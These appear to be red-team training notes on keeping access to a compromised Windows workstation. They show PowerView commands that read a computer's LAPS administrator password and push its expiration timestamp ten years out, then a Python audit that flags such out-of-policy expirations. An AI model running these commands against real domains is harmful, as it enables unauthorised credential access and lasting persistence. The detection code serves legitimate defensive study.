Password Expiration Protection
Since we were able to compromise WKSTN-1 using its LAPS password, we can set its expiration long into the future as a form of persistence.
Get expiration
powershell Get-DomainComputer -Identity wkstn-1 -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
ms-mcs-admpwdexpirationtime ms-mcs-admpwd
133101494718702551

Where 133101494718702551 is Thursday, 13 October 2022 15:44:31 GMT.
https://www.epochconverter.com/ldap
To push the expiry out by 10 years, we can overwrite this value with 136257686710000000.
Each computer has delegated access to write to its own password and expiration attributes, so we must elevate to SYSTEM on WKSTN-1.
powershell Set-DomainObject -Identity wkstn-1 -Set @{'ms-Mcs-AdmPwdExpirationTime' = '136257686710000000'} -Verbose
Setting 'ms-Mcs-AdmPwdExpirationTime' to '136257686710000000' for object 'WKSTN-1$'
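From the defender's side, this change shows up as an expiration timestamp further in the future than the LAPS password age policy allows. The audit below is an added example, not part of the original page: it converts the FILETIME values shown above and flags such hosts. The 30-day maximum age, the audit time, and the WKSTN-2 and SRV-1 rows are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta, timezone

# ms-Mcs-AdmPwdExpirationTime is a FILETIME: 100 ns ticks since 1601-01-01 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime):
    """Convert an LDAP FILETIME integer (or numeric string) to UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=int(filetime) // 10)


def find_overdue_expirations(records, now, max_age_days):
    """Return (host, expiry, days_over) for expirations beyond policy.

    A LAPS-managed password can never legitimately expire later than
    now + max_age_days, so anything past that was written out of band.
    """
    latest_allowed = now + timedelta(days=max_age_days)
    findings = []
    for host, raw in records:
        if not raw or int(raw) == 0:
            continue  # attribute unset, or 0 = reset requested; not this pattern
        expiry = filetime_to_datetime(raw)
        if expiry > latest_allowed:
            findings.append((host, expiry, (expiry - latest_allowed).days))
    return findings


# Constructed sample data. The two timestamps are the values shown on this
# page; the WKSTN-2 and SRV-1 rows, the audit time and the 30-day policy
# are assumptions made for the example.
SAMPLE_RECORDS = [
    ("WKSTN-1", "136257686710000000"),
    ("WKSTN-2", "133101494718702551"),
    ("SRV-1", None),
]
AUDIT_TIME = datetime(2022, 9, 20, tzinfo=timezone.utc)
MAX_AGE_DAYS = 30

if __name__ == "__main__":
    for host, expiry, over in find_overdue_expirations(
            SAMPLE_RECORDS, AUDIT_TIME, MAX_AGE_DAYS):
        print(f"{host}: expires {expiry:%Y-%m-%d %H:%M:%S} UTC, "
              f"{over} days past the policy maximum")
```

In practice the records would come from an export of each computer's name and ms-Mcs-AdmPwdExpirationTime, with the maximum age taken from the LAPS policy in force.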